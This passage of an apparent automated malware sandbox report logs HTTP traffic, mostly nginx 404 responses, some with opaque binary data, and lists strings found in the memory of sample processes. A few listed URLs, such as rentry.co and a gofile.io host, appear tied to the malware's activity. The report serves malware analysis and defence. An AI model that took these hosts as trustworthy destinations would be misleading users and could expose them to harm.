2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10 Data Ascii: #\/_$hDm'&B
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:44:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW\|
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:44:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:44:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0d 7f 48 e6 3d 09 f2 e8 42 f1 91 ed a1 31 da 2d da f5 6c 49 10 98 9f 9f dd 2a d1 26 10 Data Ascii: #\6H=B1-lI*&
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:44:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:44:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:44:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:44:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 5b 33 08 a5 6f 58 b5 a9 16 a7 d0 b0 fb 70 db 2c c0 f1 2f 5e 5b 89 92 8a Data Ascii: #\([3oXp,/^[
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:44:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:45:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:45:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:45:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:45:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:46:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:46:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:46:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:46:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:46:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:46:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: EF14.exe, 00000009.00000000.2414457891.00007FF71C0D4000.00000008.00000001.01000000.00000007.sdmp, EF14.exe, 00000009.00000002.2568996472.00007FF71C0E3000.00000008.00000001.01000000.00000007.sdmp, EF14.exe.1.dr	String found in binary or memory: http://.css
Source: EF14.exe, 00000009.00000000.2414457891.00007FF71C0D4000.00000008.00000001.01000000.00000007.sdmp, EF14.exe, 00000009.00000002.2568996472.00007FF71C0E3000.00000008.00000001.01000000.00000007.sdmp, EF14.exe.1.dr	String found in binary or memory: http://.jpg
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1699388658.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1699388658.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1699388658.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: EF14.exe, 00000009.00000000.2414457891.00007FF71C0D4000.00000008.00000001.01000000.00000007.sdmp, EF14.exe, 00000009.00000002.2568996472.00007FF71C0E3000.00000008.00000001.01000000.00000007.sdmp, EF14.exe.1.dr	String found in binary or memory: http://html4/loose.dtd
Source: powershell.exe, 0000000E.00000002.2701783399.000001B9C8FCB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1699388658.000000000982D000.00000004.00000001.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1697734591.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9188000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 2D42.exe, 0000000A.00000002.2754935748.000001E0026A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://rentry.co
Source: explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000001.00000000.1698965535.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1698588351.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1700184232.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9391000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 2D42.exe, 0000000A.00000002.2754935748.000001E002291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9B8F61000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000013.00000002.4110836467.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9391000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9BA6FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://store4.gofile.io
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9188000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 8EC7.exe	String found in binary or memory: http://www.oberhumer.com
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
